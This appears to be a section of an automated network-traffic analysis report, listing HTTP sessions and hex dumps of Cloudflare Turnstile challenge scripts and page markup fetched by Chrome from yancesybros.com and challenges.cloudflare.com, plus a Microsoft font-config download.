                                                    2024-11-25 18:43:53 UTC1369INData Raw: 73 2c 6e 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28
                                                    Data Ascii: s,n);var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(
                                                    2024-11-25 18:43:53 UTC1369INData Raw: 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74
                                                    Data Ascii: cument.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.st


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.4497492.18.109.164443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:53 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    Accept-Encoding: identity
                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                    Range: bytes=0-2147483646
                                                    User-Agent: Microsoft BITS/7.8
                                                    Host: fs.microsoft.com
                                                    2024-11-25 18:43:53 UTC534INHTTP/1.1 200 OK
                                                    Content-Type: application/octet-stream
                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                    ApiVersion: Distribute 1.1
                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                    X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                    Cache-Control: public, max-age=53368
                                                    Date: Mon, 25 Nov 2024 18:43:53 GMT
                                                    Content-Length: 55
                                                    Connection: close
                                                    X-CID: 2
                                                    2024-11-25 18:43:53 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.449750172.67.189.744432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:54 UTC414OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8e83c9569b4eefa7 HTTP/1.1
                                                    Host: yancesybros.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:43:54 UTC847INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:43:54 GMT
                                                    Content-Type: application/javascript; charset=UTF-8
                                                    Content-Length: 97535
                                                    Connection: close
                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3k9NTBX8ne1Q4PYBvV8%2FhnNrUzwdI%2BcZmuMMYjQ14S%2BjFcWrxODIDuEHiN%2BMh3e6PNC0xX18nGn77Wtk1WQVJSU2EcNeWtOwqbaZU5%2FHyvjyWB6rsYGQg6BtR25Ask7d0cs%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e83c979e8214375-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=992&delivery_rate=1640449&cwnd=226&unsent_bytes=0&cid=9d0f2a84e22684ba&ts=463&x=0"
                                                    2024-11-25 18:43:54 UTC522INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 53 52 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 50 69 6b 62 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22
                                                    Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.uaSR=false;window._cf_chl_opt.uPikb3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"
                                                    2024-11-25 18:43:54 UTC1369INData Raw: 32 30 61 67 61 69 6e 2e 25 32 30 49 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 25 32 30 61 74 74 65 6d 70 74 25 32 30 61 25 32 30 64 69 66 66 65 72 65 6e 74 25 32 30 6c 69 6e 6b 25 32 30 74 6f 25 32 30 67 65 74 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 64 65 73 69 72 65 64 25 32 30 70 61 67 65 2e 25 32 30 41 6c 74 65 72 6e 61 74 69 76 65 6c 79 25 32 43 25 32 30 74 72 79 25 32 30 67 6f 69 6e 67 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 72 6f 6f 74 25 32 30 6f 66 25 32 30 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 2e 22 2c 22 69 6e 74 65 72 73 74 69 74 69 61 6c 5f 68 65 6c 70 65 72 5f 65 78 70 6c 61 69 6e 65 72 22 3a 22 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 25
                                                    Data Ascii: 20again.%20If%20the%20issue%20persists%20attempt%20a%20different%20link%20to%20get%20to%20the%20desired%20page.%20Alternatively%2C%20try%20going%20to%20the%20root%20of%20%25%7Bplaceholder.com%7D.","interstitial_helper_explainer":"%25%7Bplaceholder.com%7D%
                                                    2024-11-25 18:43:54 UTC1369INData Raw: 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 37 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 25 32 37 25 33 45 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 75 6e 73 75 70 70 6f 72 74 65 64 25 33 43 25 32 46 61 25 33 45 25 32 30 61 6e 64 25 32 30 75 6e 61 62 6c 65 25 32 30 74 6f 25 32 30 63 6f 6d 70 6c 65 74 65 25 32 30 76 65 72 69 66 69 63 61 74 69 6f 6e 2e 25 32 30 54 72 79 25 32 30 61 25 32 30 64 69 66 66 65 72 65 6e 74 25 32 30 62 72 6f 77 73 65 72 25 32 30 6f 72 25 32 30 6d 61 6b 65 25 32 30 73 75 72 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 75 70 64 61 74 65 64 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 6e 65 77 65 73 74 25 32
                                                    Data Ascii: ener%20noreferrer%22%20href%3D%27challenge.supported_browsers%27%3Ebrowser%20is%20unsupported%3C%2Fa%3E%20and%20unable%20to%20complete%20verification.%20Try%20a%20different%20browser%20or%20make%20sure%20your%20browser%20is%20updated%20to%20the%20newest%2
                                                    2024-11-25 18:43:54 UTC1369INData Raw: 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 72 65 64 69 72 65 63 74 69 6e 67 5f 74 65 78 74 22 3a 22 57 61 69 74 69 6e 67 25 32 30 66 6f 72 25 32 30 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 25 32 30 74 6f 25 32 30 72 65 73 70 6f 6e 64 2e 2e 2e 22
                                                    Data Ascii: %3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","redirecting_text":"Waiting%20for%20%25%7Bplaceholder.com%7D%20to%20respond..."
                                                    2024-11-25 18:43:54 UTC1369INData Raw: 7b 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 7d 2c 22 72 74 6c 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 75 73 22 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 67 46 2c 65 4d 2c 65 4e 2c 65 51 2c 65 52 2c 66 6e 2c 66 70 2c 66 77 2c 66 78 2c 66 42 2c 66 43 2c 66 4a 2c 66 4d 2c
                                                    Data Ascii: {"turnstile_feedback_description":false,"feedback_report_output_subtitle":false,"testing_only_always_pass":false,"turnstile_timeout":false,"turnstile_overrun_description":false},"rtl":false,"lang":"en-us"};~function(gF,eM,eN,eQ,eR,fn,fp,fw,fx,fB,fC,fJ,fM,
                                                    2024-11-25 18:43:54 UTC1369INData Raw: 65 4d 5b 67 46 28 31 32 36 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 2c 68 50 2c 6f 2c 78 2c 42 2c 43 2c 48 2c 44 2c 45 2c 46 29 7b 69 66 28 68 50 3d 67 46 2c 6f 3d 7b 27 68 77 52 5a 53 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3e 48 7d 2c 27 6d 4c 46 44 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 49 4a 6e 67 64 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3e 3e 48 7d 2c 27 76 6a 4f 76 65 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 7c 48 7d 2c 27 49 57 63 43 46 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 43 50 55 49 4b 27 3a 68 50 28 34 38 31 29 2c 27 75 6d 4f
                                                    Data Ascii: eM[gF(1260)]=function(g,h,i,j,hP,o,x,B,C,H,D,E,F){if(hP=gF,o={'hwRZS':function(G,H){return G>H},'mLFDL':function(G,H){return G<H},'IJngd':function(G,H){return G>>H},'vjOve':function(G,H){return G|H},'IWcCF':function(G,H){return H===G},'CPUIK':hP(481),'umO
                                                    2024-11-25 18:43:54 UTC1369INData Raw: 31 38 29 3a 28 44 2b 3d 45 5b 68 56 28 36 33 37 29 5d 28 4b 3e 3e 31 32 7c 32 32 34 2e 36 37 29 2c 46 2b 3d 47 5b 68 56 28 36 33 37 29 5d 28 48 5b 68 56 28 34 38 36 29 5d 28 48 5b 68 56 28 37 31 33 29 5d 28 4b 2c 36 29 26 36 33 2c 31 32 38 29 29 29 2c 48 2b 3d 49 5b 68 56 28 36 33 37 29 5d 28 48 5b 68 56 28 39 36 34 29 5d 28 4b 2c 36 33 29 7c 31 32 38 29 29 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 50 28 36 38 35 29 5d 5b 68 50 28 35 34 37 29 5d 28 42 29 2c 43 3d 30 3b 6f 5b 68 50 28 36 32 35 29 5d 28 43 2c 78 5b 68 50 28 31 30 33 35 29 5d 29 3b 6f 5b 68 50 28 31 30 33 37 29 5d 28 68 50 28 31 31 34 35 29 2c 6f 5b 68 50 28 37 37 34 29 5d 29 3f 28 69 5b 68 50 28 35 39 31 29 5d 5b 68 50 28 36 35 32 29
                                                    Data Ascii: 18):(D+=E[hV(637)](K>>12|224.67),F+=G[hV(637)](H[hV(486)](H[hV(713)](K,6)&63,128))),H+=I[hV(637)](H[hV(964)](K,63)|128))}(x),B='nAsAaAb'.split('A'),B=B[hP(685)][hP(547)](B),C=0;o[hP(625)](C,x[hP(1035)]);o[hP(1037)](hP(1145),o[hP(774)])?(i[hP(591)][hP(652)
                                                    2024-11-25 18:43:54 UTC1369INData Raw: 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 68 58 29 7b 69 66 28 68 58 3d 68 57 2c 69 5b 68 58 28 31 33 35 35 29 5d 28 68 58 28 35 36 37 29 2c 68 58 28 35 36 37 29 29 29 6e 65 77 20 67 5b 28 68 58 28 34 32 35 29 29 5d 28 68 29 28 69 2c 6a 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 27 6f 2e 27 2b 6f 7d 29 7d 2c 65 4d 5b 67 46 28 34 30 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 33 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 29 7b 66 6f 72 28 69 33 3d 67 46 2c 63 3d 7b 27 6a 65 56 44 79 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 29 7b 72 65 74 75 72 6e 20 6a 2a 69 7d 2c 27 52 44 75 66 79 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 29 7b 72 65 74 75 72 6e 20 69 2b 6a 7d 2c 27 4f 65 58 70 51 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 29 7b 72 65 74 75 72 6e 20 69 28 6a 29 7d 7d
                                                    Data Ascii: )](function(o,hX){if(hX=hW,i[hX(1355)](hX(567),hX(567)))new g[(hX(425))](h)(i,j);else return'o.'+o})},eM[gF(404)]=function(i3,c,d,e,f,g,h){for(i3=gF,c={'jeVDy':function(i,j){return j*i},'RDufy':function(i,j){return i+j},'OeXpQ':function(i,j){return i(j)}}
                                                    2024-11-25 18:43:54 UTC1369INData Raw: 35 28 36 37 30 29 5d 3d 65 4d 5b 69 35 28 35 39 31 29 5d 5b 69 35 28 36 37 30 29 5d 2c 78 5b 69 35 28 31 32 36 38 29 5d 3d 65 4d 5b 69 35 28 35 39 31 29 5d 5b 69 35 28 31 32 36 38 29 5d 2c 78 5b 69 35 28 38 39 37 29 5d 3d 65 4d 5b 69 35 28 35 39 31 29 5d 5b 69 35 28 38 39 37 29 5d 2c 78 5b 69 35 28 31 32 39 30 29 5d 3d 65 4d 5b 69 35 28 35 39 31 29 5d 5b 69 35 28 39 37 39 29 5d 2c 78 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 44 5b 69 35 28 37 30 31 29 5d 28 6b 5b 69 35 28 31 32 34 35 29 5d 28 27 76 5f 27 2c 65 4d 5b 69 35 28 35 39 31 29 5d 5b 69 35 28 37 35 39 29 5d 29 2b 27 3d 27 2b 43 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 43 3d 67 44 5b 69 35 28 31 31 35 35 29 5d 28 73 29 5b 69 35 28 39 35 34 29 5d 28 27 2b 27 2c 69 35
                                                    Data Ascii: 5(670)]=eM[i5(591)][i5(670)],x[i5(1268)]=eM[i5(591)][i5(1268)],x[i5(897)]=eM[i5(591)][i5(897)],x[i5(1290)]=eM[i5(591)][i5(979)],x);continue;case'4':D[i5(701)](k[i5(1245)]('v_',eM[i5(591)][i5(759)])+'='+C);continue;case'5':C=gD[i5(1155)](s)[i5(954)]('+',i5
                                                    2024-11-25 18:43:54 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 21 3d 3d 6e 7d 2c 27 48 6c 49 68 67 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 2c 27 4c 72 45 6f 65 27 3a 69 36 28 38 34 38 29 7d 2c 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 28 66 3d 64 5b 69 36 28 36 38 39 29 5d 2c 64 5b 69 36 28 39 30 35 29 5d 26 26 65 5b 69 36 28 31 32 30 37 29 5d 28 74 79 70 65 6f 66 20 64 5b 69 36 28 39 30 35 29 5d 2c 69 36 28 34 39 39 29 29 29 26 26 28 6a 3d 64 5b 69 36 28 39 30 35 29 5d 5b 69 36 28 37 37 31 29 5d 28 27 5c 6e 27 29 2c 6a 5b 69 36 28 31 30 33 35 29 5d 3e 31 29 26 26 28 65 5b 69 36 28 33 36 38 29 5d 28 69 36 28 38 31 30 29 2c 69 36 28 38 31 30 29 29 3f 28 66 5b 69 36 28 31 31 35 33 29
                                                    Data Ascii: function(n,o){return o!==n},'HlIhg':function(n,o,s){return n(o,s)},'LrEoe':i6(848)},d instanceof Error)(f=d[i6(689)],d[i6(905)]&&e[i6(1207)](typeof d[i6(905)],i6(499)))&&(j=d[i6(905)][i6(771)]('\n'),j[i6(1035)]>1)&&(e[i6(368)](i6(810),i6(810))?(f[i6(1153)


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.449752104.18.94.414432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:55 UTC764OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/a7tsf/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/ HTTP/1.1
                                                    Host: challenges.cloudflare.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    sec-ch-ua-platform: "Windows"
                                                    Upgrade-Insecure-Requests: 1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: navigate
                                                    Sec-Fetch-Dest: iframe
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:43:55 UTC1362INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:43:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 26439
                                                    Connection: close
                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                    content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                    cross-origin-embedder-policy: require-corp
                                                    cross-origin-opener-policy: same-origin
                                                    cross-origin-resource-policy: cross-origin
                                                    origin-agent-cluster: ?1
                                                    accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                    critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                    referrer-policy: same-origin
                                                    document-policy: js-profiling
                                                    2024-11-25 18:43:55 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 38 33 63 39 37 66 66 39 36 32 31 61 34 38 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                    Data Ascii: Server: cloudflareCF-RAY: 8e83c97ff9621a48-EWRalt-svc: h3=":443"; ma=86400
                                                    2024-11-25 18:43:55 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                    Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                    2024-11-25 18:43:55 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
